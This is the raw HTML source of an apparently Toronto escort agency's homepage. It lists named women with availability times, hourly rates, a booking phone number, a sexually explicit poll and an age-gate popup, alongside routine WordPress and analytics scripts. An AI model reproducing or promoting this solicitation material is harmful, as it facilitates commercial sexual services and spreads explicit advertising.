src='https://hotpinklist.com/wp-content/themes/Hotpink2012Q/jquery.js?ver=4.9.10'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=3.5.0'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/itro-popup/scripts/itro-scripts.js?ver=4.9.10'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&#038;ver=4.9.10'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&#038;ver=4.9.10'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/themes/Hotpink2012Q/script.js?ver=4.9.10'></script> <link rel='https://api.w.org/' href='https://hotpinklist.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://hotpinklist.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://hotpinklist.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://hotpinklist.com/' /> <link rel="alternate" type="application/json+oembed" href="https://hotpinklist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhotpinklist.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://hotpinklist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhotpinklist.com%2F&#038;format=xml" /> <style type="text/css">.rtw_container{ width:280px !important; }.rtw_tweets{ height:800px !important; }.rtw_container{ background:#ef1f76 !important; }.rtw_twitter_username p a,.rtw_twitter_username h3 a,.rtw_footer .twitter_widget_footer_link a{ color:#ffffff !important; }.rtw_tweets{ background:#000000 !important; }.rtw_tweets li p{ color:#ffffff !important; }.rtw_tweets li a,.rtw_tweets li p a{ color:#ef1f76 !important; }.rtw_tweets{ overflow-y: hidden !important; }</style><script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//hotpinklist.com/?wordfence_lh=1&hid=D0AA5528C7F28D8C5DDD9D537E4A4630'); </script> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> </head> <body data-rsssl=1 class="home page-template-default page page-id-8 woocommerce-no-js"> <div id="art-main"> <div id="art-header-bg"> </div> <div id="art-hmenu-bg" class="art-bar art-nav"> </div> <div class="art-sheet clearfix"> <header class="art-header"> <div class="art-shapes"> </div> </header> <nav class="art-nav"> <div class="art-nav-inner"> <ul class="art-hmenu menu-124"> <li class="menu-item-11712 active"><a title="Home" href="https://hotpinklist.com/" class="active">Home</a> </li> <li class="menu-item-11715"><a title="Pink Ladies" href="https://hotpinklist.com/pink-ladies/">Pink Ladies</a> </li> <li class="menu-item-11716"><a title="Rates" href="https://hotpinklist.com/rates/">Rates</a> </li> <li class="menu-item-11717"><a title="Schedule" href="https://hotpinklist.com/schedule/">Schedule</a> </li> <li class="menu-item-11718"><a title="Hiring" href="https://hotpinklist.com/contact/">Hiring</a> </li> <li class="menu-item-19414"><a title="FAQ" href="https://hotpinklist.com/faq/">FAQ</a> </li> </ul> </div> </nav> <div class="art-layout-wrapper"> <div class="art-content-layout"> <div class="art-content-layout-row"> <div class="art-layout-cell art-content"> <article id="post-8" class="art-post art-article post-8 page type-page status-publish hentry"> <div class="art-postcontent clearfix"><div style="text-align:center;font-size:34px;color:white;width:970px;">You <strong>MUST</strong> 21+ to view this website</div> <div style="width: 970px !important; margin-bottom: 50px; margin-top: 50px;"><!-- START REVOLUTION SLIDER 4.6.0 fullwidth mode --> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" style="margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:460px;"> <div id="rev_slider_1_1" class="rev_slider fullwidthabanner" style="display:none;max-height:460px;height:460px;"> <ul> <!-- SLIDE --> <li data-transition="random" data-slotamount="7" data-masterspeed="300" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="https://hotpinklist.com/wp-content/plugins/revslider/images/transparent.png" style='background-color:#000000' alt="" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-fade" data-x="5" data-y="-7" data-speed="300" data-start="500" data-easing="Power3.easeInOut" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 2;"><img src="https://hotpinklist.com/wp-content/uploads/2019/03/TEXTAPP_BANNER.png" alt="" data-ww="950" data-hh="448"> </div> </li> <!-- SLIDE --> <li data-transition="random" data-slotamount="7" data-masterspeed="300" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="https://hotpinklist.com/wp-content/plugins/revslider/images/transparent.png" style='background-color:#000000' alt="" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-fade" data-x="-1" data-y="-9" data-speed="300" data-start="500" data-easing="Power3.easeInOut" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 2;"><img src="https://hotpinklist.com/wp-content/uploads/2017/10/newbannerHPL_front2.png" alt=""> </div> <!-- LAYER NR. 2 --> <div class="tp-caption largepinkbg skewfromleft stb tp-resizeme" data-x="363" data-y="294" data-speed="500" data-start="500" data-easing="Power3.easeInOut" data-splitin="chars" data-splitout="none" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 3; max-width: auto; max-height: auto; white-space: nowrap;">Welcome to: </div> </li> <!-- SLIDE --> <li data-transition="random" data-slotamount="7" data-masterspeed="300" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="https://hotpinklist.com/wp-content/plugins/revslider/images/transparent.png" style='background-color:#000000' alt="" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-fade" data-x="8" data-y="-13" data-speed="300" data-start="500" data-easing="Power3.easeInOut" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 2;"><img src="https://hotpinklist.com/wp-content/uploads/2019/04/ratesmay2019.png" alt="" data-ww="941.2083333333333" data-hh="461"> </div> </li> <!-- SLIDE --> <li data-transition="random" data-slotamount="7" data-masterspeed="300" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="https://hotpinklist.com/wp-content/plugins/revslider/images/transparent.png" style='background-color:#000000' alt="" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-fade" data-x="center" data-hoffset="0" data-y="center" data-voffset="0" data-speed="300" data-start="500" data-easing="Power3.easeInOut" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 2;"><img src="https://hotpinklist.com/wp-content/uploads/2014/09/Sept1stbanner.jpg" alt=""> </div> </li> <!-- SLIDE --> <li data-transition="random" data-slotamount="7" data-masterspeed="300" data-saveperformance="off" > <!-- MAIN IMAGE --> <img src="https://hotpinklist.com/wp-content/plugins/revslider/images/transparent.png" style='background-color:#000000' alt="hiring_slider2014_2" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-fade" data-x="-2" data-y="-21" data-speed="300" data-start="500" data-easing="Power3.easeInOut" data-elementdelay="0.1" data-endelementdelay="0.1" data-endspeed="300" style="z-index: 2;"><img src="https://hotpinklist.com/wp-content/uploads/2014/01/hiring_slider2014_2.jpg" alt=""> </div> </li> </ul> <div class="tp-bannertimer"></div> </div> <script type="text/javascript"> /****************************************** - PREPARE PLACEHOLDER FOR SLIDER - ******************************************/ var setREVStartSize = function() { var tpopt = new Object(); tpopt.startwidth = 960; tpopt.startheight = 460; tpopt.container = jQuery('#rev_slider_1_1'); tpopt.fullScreen = "off"; tpopt.forceFullWidth="off"; tpopt.container.closest(".rev_slider_wrapper").css({height:tpopt.container.height()});tpopt.width=parseInt(tpopt.container.width(),0);tpopt.height=parseInt(tpopt.container.height(),0);tpopt.bw=tpopt.width/tpopt.startwidth;tpopt.bh=tpopt.height/tpopt.startheight;if(tpopt.bh>tpopt.bw)tpopt.bh=tpopt.bw;if(tpopt.bh<tpopt.bw)tpopt.bw=tpopt.bh;if(tpopt.bw<tpopt.bh)tpopt.bh=tpopt.bw;if(tpopt.bh>1){tpopt.bw=1;tpopt.bh=1}if(tpopt.bw>1){tpopt.bw=1;tpopt.bh=1}tpopt.height=Math.round(tpopt.startheight*(tpopt.width/tpopt.startwidth));if(tpopt.height>tpopt.startheight&&tpopt.autoHeight!="on")tpopt.height=tpopt.startheight;if(tpopt.fullScreen=="on"){tpopt.height=tpopt.bw*tpopt.startheight;var cow=tpopt.container.parent().width();var coh=jQuery(window).height();if(tpopt.fullScreenOffsetContainer!=undefined){try{var offcontainers=tpopt.fullScreenOffsetContainer.split(",");jQuery.each(offcontainers,function(e,t){coh=coh-jQuery(t).outerHeight(true);if(coh<tpopt.minFullScreenHeight)coh=tpopt.minFullScreenHeight})}catch(e){}}tpopt.container.parent().height(coh);tpopt.container.height(coh);tpopt.container.closest(".rev_slider_wrapper").height(coh);tpopt.container.closest(".forcefullwidth_wrapper_tp_banner").find(".tp-fullwidth-forcer").height(coh);tpopt.container.css({height:"100%"});tpopt.height=coh;}else{tpopt.container.height(tpopt.height);tpopt.container.closest(".rev_slider_wrapper").height(tpopt.height);tpopt.container.closest(".forcefullwidth_wrapper_tp_banner").find(".tp-fullwidth-forcer").height(tpopt.height);} }; /* CALL PLACEHOLDER */ setREVStartSize(); var tpj=jQuery; tpj.noConflict(); var revapi1; tpj(document).ready(function() { if(tpj('#rev_slider_1_1').revolution == undefined) revslider_showDoubleJqueryError('#rev_slider_1_1'); else revapi1 = tpj('#rev_slider_1_1').show().revolution( { dottedOverlay:"none", delay:9000, startwidth:960, startheight:460, hideThumbs:200, thumbWidth:100, thumbHeight:50, thumbAmount:5, simplifyAll:"off", navigationType:"bullet", navigationArrows:"solo", navigationStyle:"round", touchenabled:"on", onHoverStop:"on", nextSlideOnWindowFocus:"off", swipe_threshold: 75, swipe_min_touches: 1, drag_block_vertical: false, keyboardNavigation:"off", navigationHAlign:"center", navigationVAlign:"bottom", navigationHOffset:0, navigationVOffset:20, soloArrowLeftHalign:"left", soloArrowLeftValign:"center", soloArrowLeftHOffset:20, soloArrowLeftVOffset:0, soloArrowRightHalign:"right", soloArrowRightValign:"center", soloArrowRightHOffset:20, soloArrowRightVOffset:0, shadow:2, fullWidth:"on", fullScreen:"off", spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", forceFullWidth:"off", hideThumbsOnMobile:"off", hideNavDelayOnMobile:1500, hideBulletsOnMobile:"off", hideArrowsOnMobile:"off", hideThumbsUnderResolution:0, hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, startWithSlide:0 }); }); /*ready*/ </script> </div><!-- END REVOLUTION SLIDER --></div> <div id=""> <div class="left"> <div style="width: 390px;"> <strong>HPL Sexy Poll:</strong><br /> <div id="polls-7" class="wp-polls"> <form id="polls_form_7" class="wp-polls-form" action="/index.php" method="post"> <p style="display: none;"><input type="hidden" id="poll_7_nonce" name="wp-polls-nonce" value="152a44a0f5" /></p> <p style="display: none;"><input type="hidden" name="poll_id" value="7" /></p> <p style="text-align: left;"><span style="color:#ffffff;">I like when a girl...</span></p><div id="polls-7-ans" class="wp-polls-ans"><ul class="wp-polls-ul"> <li><input type="radio" id="poll-answer-36" name="poll_7" value="36" /> <label for="poll-answer-36">plays with herself..</label></li> <li><input type="radio" id="poll-answer-37" name="poll_7" value="37" /> <label for="poll-answer-37">roleplays..</label></li> <li><input type="radio" id="poll-answer-38" name="poll_7" value="38" /> <label for="poll-answer-38">tease/strip..</label></li> <li><input type="radio" id="poll-answer-39" name="poll_7" value="39" /> <label for="poll-answer-39">enjoys exhibition fun</label></li> <li><input type="radio" id="poll-answer-40" name="poll_7" value="40" /> <label for="poll-answer-40">makes me a sandwich</label></li> </ul><p style="text-align: center;"><input type="button" name="vote" value=" Vote " class="Buttons" onclick="poll_vote(7);" /></p><p style="text-align: center;"><a href="#ViewPollResults" onclick="poll_result(7); return false;" title="View Results Of This Poll">View Results</a></p></div> </form> </div> <div id="polls-7-loading" class="wp-polls-loading"><img src="https://hotpinklist.com/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div> </p> <hr> <a class="twitter-timeline" href="https://twitter.com/HotPinkList" data-widget-id="624293690874417152">Tweets by @HotPinkList</a><br /> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> </div> </div> </div> <div class="right"> <div class="sliderMain2"> <p align="center"><a class="art-button" title="View All Ladies Available Today" href="https://hotpinklist.com/pink-ladies/"><strong><span style="color: #ffffff;">Check out who’s available today!</span></strong></a></p> <div style="text-align:center"> <div class="pink-ladies-home"><a href="https://hotpinklist.com/tina/" title="Tina"></p> <div class="image"><img width="171" height="171" src="https://hotpinklist.com/wp-content/uploads/2017/09/TinaNew-9-300x300.jpg" class="attachment-171x171 size-171x171 wp-post-image" alt="" srcset="https://hotpinklist.com/wp-content/uploads/2017/09/TinaNew-9-300x300.jpg 300w, https://hotpinklist.com/wp-content/uploads/2017/09/TinaNew-9-100x100.jpg 100w, https://hotpinklist.com/wp-content/uploads/2017/09/TinaNew-9-150x150.jpg 150w" sizes="(max-width: 171px) 100vw, 171px" /></p> <div class="image-text">Tina</div> <div style="width:10px;float:left"></div> </div> <p></a></p> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Time:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">1030-8</div> <div class="cleared"></div> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Location:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">AP</div> <div class="cleared"></div> </div> <div class="pink-ladies-home"><a href="https://hotpinklist.com/kyllie/" title="Kyllie"></p> <div class="image"><img width="171" height="171" src="https://hotpinklist.com/wp-content/uploads/2018/09/KyllieSept-5-300x300.jpeg" class="attachment-171x171 size-171x171 wp-post-image" alt="" srcset="https://hotpinklist.com/wp-content/uploads/2018/09/KyllieSept-5-300x300.jpeg 300w, https://hotpinklist.com/wp-content/uploads/2018/09/KyllieSept-5-150x150.jpeg 150w, https://hotpinklist.com/wp-content/uploads/2018/09/KyllieSept-5-100x100.jpeg 100w" sizes="(max-width: 171px) 100vw, 171px" /></p> <div class="image-text">Kyllie</div> <div style="width:10px;float:left"></div> </div> <p></a></p> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Time:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">11-8</div> <div class="cleared"></div> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Location:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">MIS</div> <div class="cleared"></div> </div> <div class="pink-ladies-home"><a href="https://hotpinklist.com/giselle/" title="Giselle"></p> <div class="image"><img width="171" height="171" src="https://hotpinklist.com/wp-content/uploads/2018/04/GiselleMay7-300x300.jpg" class="attachment-171x171 size-171x171 wp-post-image" alt="" srcset="https://hotpinklist.com/wp-content/uploads/2018/04/GiselleMay7-300x300.jpg 300w, https://hotpinklist.com/wp-content/uploads/2018/04/GiselleMay7-150x150.jpg 150w, https://hotpinklist.com/wp-content/uploads/2018/04/GiselleMay7-100x100.jpg 100w" sizes="(max-width: 171px) 100vw, 171px" /></p> <div class="image-text">Giselle</div> <div style="width:10px;float:left"></div> </div> <p></a></p> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Time:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">12-8</div> <div class="cleared"></div> <div class="cleared"></div> <div style="text-align:left;float:left"><span style="color: #fd0095;"><strong>Location:</strong></span></div> <div style="text-align:right;float:right;padding-right:10px;color:#ffffff">NY</div> <div class="cleared"></div> </div> </div> </div> <div class="cleared"></div> <div class="homepage-text"> <p>Welcome to HotPinkList &#8211; Best Toronto Escorts<br /> A truly intimate escort agency based in Toronto, Airport YYZ,<br /> North York, Markham, Richmond Hill and more!<br /> Please check out our Pink Ladies page to view our PinkList Escorts<br /> for availability, more information and 100% Real Photos!</p> <p><strong>HOTPINKLIST UPDATES:</strong></p> <ul> <li>Open Hours: <strong>Mon-Sun 9am-10pm </strong><br /> (Hours of operation may be subjected to change) </li> <li>Rate increase effective Oct 15th 2018 &#8211; $240/1HR All locations</li> <li>Next weeks SCHEDULE updated on Sundays &#8211; Stay tuned</li> </ul> <p>To make a booking with one the ladies please call or text us at <strong>416-799-7111</strong></strong></div> <hr> <div></div> </div> </div> </article> </div> </div> </div> </div> </div> <footer class="art-footer"> <div class="art-footer-inner"><div class="art-footer-text"> <table style="width:100%" cellspacing="2" cellpadding="2" border="0"> <tr> <td valign="top"><p style="text-align: left;padding-left:15px;"><span class="foot-title" style="color:white;">E<span class="foot-title-pink">mail</span></span></p><p style="text-align: left;font-size: 1.2em;padding-left:15px;"><a href="mailto:[email protected]"><span style="font-size: 1.2em;">[email protected]</span></a></p></td> <td valign="top"><p style="text-align:middle;color:white;padding-right:20px;">Copyright © Hot PinK List. All Rights Reserved.</p> </td> <td valign="top"><p style="text-align: right;padding-right:15px;"><span class="foot-title" style="color:white;">C<span class="foot-title-pink">ontact</span></span></p> <p style="text-align:right;color:white;padding-right:15px;">Call Us: 416-799-7111</p> </td> </tr> <tr> <td colspan="3" align="center"></td> </tr> </table> </div> </div> </footer> </div> <div id="wp-footer"> <style> /* POP-UP */ #age_button_area { padding-top:10px; position: relative; width: 100%; bottom: 5px; padding-top:5px; } #ageEnterButton { border-color:; background:#FFFFFF; color: #000000; } #ageLeaveButton { border-color:; background:#FFFFFF; color: #000000; } #popup_content { overflow-y:auto; overflow-x: auto; height: 100%; width:100%; } #itro_popup { visibility: hidden; opacity: 0; position: absolute; background-image: ; background-repeat: no-repeat; background-position: center center; margin: 0 auto; left:1px; right:1px; z-index: 2147483647 !important; padding:2px !important; border: solid;border-color:#FFFFFF; border-radius: 8px; border-width: 3px; width: 820px; height: 380px; background-color: #000000; padding-bottom: 15px; } #close_cross { cursor:pointer; width:20px; position:absolute; top:-22px; right:-22px; } #popup_countdown { color: ; width: 100%; padding-top: 1px ; padding-bottom:1px ; background-color: #FFFFFF; height: ; overflow: hidden; position:absolute; bottom:0px; left:0px; border-bottom-left:8px; border-bottom-right:8px; } #itro_opaco{ display: none; position:fixed; background-color: #8A8A8A; font-size: 10px; font-family: Verdana; top: 100px; width: 100%; height: 100%; z-index: 2147483646 !important; left: 0px ; right: 0px; top: 0px; bottom: 0px; opacity: 0.40 ; filter:alpha(opacity = 40); /* For IE8 and earlier */ } /* label under the popup used to close it for mobile devices */ #ipp_mobile_close_tab{ display: none; border:none; position: absolute; padding: 5px; width: 80px; text-align: center; left: 1px; right: 1px; margin: auto; background-color: #FFFFFF } #ipp_mobile_close_txt{ font-weight: bold; cursor: pointer; } /* RESPONSIVE CSS */ @media screen and (max-width: 780px) { #itro_popup{ max-width: 470px; } #close_cross{ display: none; } #ipp_mobile_close_tab{ display: block; } } @media screen and (max-width: 480px){ #itro_popup{ max-width: 300px } } </style> <div id="itro_popup"> <div id="popup_content"><p><a href="https://hotpinklist.com/wp-content/uploads/2014/07/Enter2014.jpg"><img class="aligncenter size-full wp-image-3962" src="https://hotpinklist.com/wp-content/uploads/2014/07/Enter2014.jpg" alt="Enter2014" width="800" height="306" /></a></p> <p id="age_button_area" style="text-align: center;"> <input type="button" id="ageEnterButton" onClick="itro_set_cookie('popup_cookie','one_time_popup',168); itro_exit_anim(); javascript:window.open('','_self');" value="I AM OVER 21 - Enter"> <input type="button" id="ageLeaveButton" onClick="javascript:window.open('http://www.google.com','_self');" value="I AM UNDER 21 - Leave"> </p> </div> </div> <div id="itro_opaco" ></div> <script type="text/javascript"> /* init var */ itro_cookie_expiration = 168; itro_is_preview = false;/* pass true if is the preview page. used for cookie control via js due W3 total cache or similar */ auto_margin = "yes"; /* invert the color of the mobile close tab label text */ jQuery('#ipp_mobile_close_txt').css({color: itro_invert_color(itro_rgb2hex(jQuery('#itro_popup').css('border-bottom-color'))) }); itro_enter_anim(auto_margin); </script> <script async>(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='be401f00b42f7f00c539b100ec4430007c635200d1e51000d324e400be38ed00';j.dataset.sumoPlatform='wordpress';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumo.com/');</script> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <div class="revsliderstyles"><style type="text/css">.tp-caption.largepinkbg{font-size:40px;line-height:50px;font-weight:500;font-family:Arial,Helvetica,sans-serif;color:rgb(255,255,255);text-decoration:none;background-color:rgba(255,20,147,0.51);padding:0px 2px 0px 4px;text-shadow:none;border-width:0px;border-color:rgb(255,255,255);border-style:none}.largepinkbg{font-size:40px;line-height:50px;font-weight:500;font-family:Arial,Helvetica,sans-serif;color:rgb(255,255,255);text-decoration:none;background-color:rgba(255,20,147,0.51);padding:0px 2px 0px 4px;text-shadow:none;border-width:0px;border-color:rgb(255,255,255);border-style:none}</style> </div><link rel='stylesheet' id='wpBannerizeStyleDefault.css-css' href='https://hotpinklist.com/wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css?ver=4.9.10' type='text/css' media='all' /> <script type='text/javascript' src='https://hotpinklist.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script> <script type='text/javascript'> jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});}); </script> <script type='text/javascript' src='https://hotpinklist.com/wp-includes/js/comment-reply.min.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/hotpinklist.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/hotpinklist.com","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.4.3'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.4.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_7a9c949ab60000292e4612ba20e61cb0","fragment_name":"wc_fragments_7a9c949ab60000292e4612ba20e61cb0"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.4.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"https:\/\/hotpinklist.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var JQLBSettings = {"fitToScreen":"0","resizeSpeed":"400","displayDownloadLink":"0","navbarOnTop":"0","loopImages":"","resizeCenter":"","marginSize":"","linkTarget":"","help":"","prevLinkTitle":"previous image","nextLinkTitle":"next image","prevLinkText":"\u00ab Previous","nextLinkText":"Next \u00bb","closeTitle":"close image gallery","image":"Image ","of":" of ","download":"Download","jqlb_overlay_opacity":"80","jqlb_overlay_color":"#000000","jqlb_overlay_close":"1","jqlb_border_width":"10","jqlb_border_color":"#ffffff","jqlb_border_radius":"0","jqlb_image_info_background_transparency":"100","jqlb_image_info_bg_color":"#ffffff","jqlb_image_info_text_color":"#000000","jqlb_image_info_text_fontsize":"10","jqlb_show_text_for_image":"1","jqlb_next_image_title":"next image","jqlb_previous_image_title":"previous image","jqlb_next_button_image":"https:\/\/hotpinklist.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/next.gif","jqlb_previous_button_image":"https:\/\/hotpinklist.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/prev.gif","jqlb_maximum_width":"","jqlb_maximum_height":"","jqlb_show_close_button":"1","jqlb_close_image_title":"close image gallery","jqlb_close_image_max_heght":"22","jqlb_image_for_close_lightbox":"https:\/\/hotpinklist.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/closelabel.gif","jqlb_keyboard_navigation":"1","jqlb_popup_size_fix":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/wp-lightbox-2/wp-lightbox-2.min.js?ver=1.3.4.1'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/page-links-to/js/new-tab.min.js?ver=2.11.1'></script> <script type='text/javascript' src='https://hotpinklist.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpBannerizeJavascriptLocalization = {"ajaxURL":"https:\/\/hotpinklist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotpinklist.com/wp-content/plugins/wp-bannerize/js/wpBannerizeFrontend.min.js?ver=3.1.6'></script> <!-- 167 queries. 1.222 seconds. --> </div> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-37536867-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
0
